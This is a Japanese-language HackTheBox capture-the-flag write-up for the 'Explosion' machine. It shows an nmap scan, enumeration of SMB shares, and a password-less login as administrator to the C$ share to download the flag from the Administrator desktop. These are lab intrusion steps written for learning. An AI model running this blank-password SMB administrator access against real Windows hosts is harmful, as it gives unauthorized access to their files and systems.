概要
HackThebox:Explosionのflagを入手する手順を記す。
Port Scan
$ nmap -F -sV explosion.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 21:28 EDT
Nmap scan report for explosion.htb (10.129.242.218)
Host is up (0.25s latency).
Not shown: 96 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.77 seconds
- SMB
- RDP
が提供されていることが分かる。
SMB
接続しShareを探索してみる。
$ smbclient -L \\\\explosion.htb\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to explosion.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
ここで列挙されたShareに対してWORKGROUP\administratorでアクセスするとパスワード無しでログインできる。
C$を探索してみる。
$ smbclient -U administrator \\\\explosion.htb\\C$
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Sat Sep 15 03:19:00 2018
Config.Msi DHS 0 Wed Jul 7 13:27:28 2021
Documents and Settings DHSrn 0 Wed Apr 21 05:50:21 2021
pagefile.sys AHS 738197504 Tue Sep 13 21:53:52 2022
PerfLogs D 0 Sat Sep 15 03:19:00 2018
Program Files DR 0 Wed Jul 7 13:26:52 2021
Program Files (x86) D 0 Sat Sep 15 05:06:10 2018
ProgramData DH 0 Wed Apr 21 05:55:59 2021
Recovery DHSn 0 Wed Apr 21 05:50:27 2021
System Volume Information DHS 0 Wed Apr 21 06:02:07 2021
Users DR 0 Wed Apr 21 05:51:22 2021
Windows D 0 Wed Jul 7 13:29:19 2021
3770367 blocks of size 4096. 1046687 blocks available
smb: \> cd Users
ls
smb: \Users\> ls
. DR 0 Wed Apr 21 05:51:22 2021
.. DR 0 Wed Apr 21 05:51:22 2021
Administrator D 0 Wed Apr 21 05:51:35 2021
All Users DHSrn 0 Sat Sep 15 03:28:48 2018
Default DHR 0 Wed Apr 21 05:50:21 2021
Default User DHSrn 0 Sat Sep 15 03:28:48 2018
desktop.ini AHS 174 Sat Sep 15 03:16:48 2018
Public DR 0 Wed Apr 21 05:51:35 2021
cd A
3770367 blocks of size 4096. 1046687 blocks available
smb: \Users\> cd Administrator\
smb: \Users\Administrator\> ls
. D 0 Wed Apr 21 05:51:35 2021
.. D 0 Wed Apr 21 05:51:35 2021
3D Objects DR 0 Wed Apr 21 05:51:35 2021
AppData DH 0 Wed Apr 21 05:51:22 2021
Application Data DHSrn 0 Wed Apr 21 05:51:22 2021
Contacts DR 0 Wed Apr 21 05:51:35 2021
Cookies DHSrn 0 Wed Apr 21 05:51:22 2021
Desktop DR 0 Wed Apr 21 00:27:12 2021
Documents DR 0 Wed Apr 21 05:51:35 2021
Downloads DR 0 Wed Jul 7 06:22:28 2021
Favorites DR 0 Wed Apr 21 05:51:35 2021
Links DR 0 Wed Apr 21 05:51:36 2021
Local Settings DHSrn 0 Wed Apr 21 05:51:22 2021
Music DR 0 Wed Apr 21 05:51:35 2021
My Documents DHSrn 0 Wed Apr 21 05:51:22 2021
NetHood DHSrn 0 Wed Apr 21 05:51:22 2021
NTUSER.DAT AHn 786432 Wed Sep 22 06:50:58 2021
ntuser.dat.LOG1 AHS 0 Wed Apr 21 05:51:22 2021
ntuser.dat.LOG2 AHS 155648 Wed Apr 21 05:51:22 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Tue Apr 20 23:20:41 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Apr 21 05:51:22 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Apr 21 05:51:22 2021
ntuser.ini HS 20 Wed Apr 21 05:51:22 2021
Pictures DR 0 Wed Apr 21 05:51:35 2021
PrintHood DHSrn 0 Wed Apr 21 05:51:22 2021
Recent DHSrn 0 Wed Apr 21 05:51:22 2021
Saved Games DR 0 Wed Apr 21 05:51:35 2021
Searches DR 0 Wed Apr 21 05:51:35 2021
SendTo DHSrn 0 Wed Apr 21 05:51:22 2021
Start Menu DHSrn 0 Wed Apr 21 05:51:22 2021
Templates DHSrn 0 Wed Apr 21 05:51:22 2021
Videos DR 0 Wed Apr 21 05:51:35 2021
cd Desk
3770367 blocks of size 4096. 1046687 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Wed Apr 21 00:27:12 2021
.. DR 0 Wed Apr 21 00:27:12 2021
desktop.ini AHS 282 Wed Apr 21 05:51:35 2021
flag.txt A 34 Fri Apr 23 05:51:16 2021
3770367 blocks of size 4096. 1046687 blocks available
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 34 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
無事flag.txtをダウンロードできたので完了。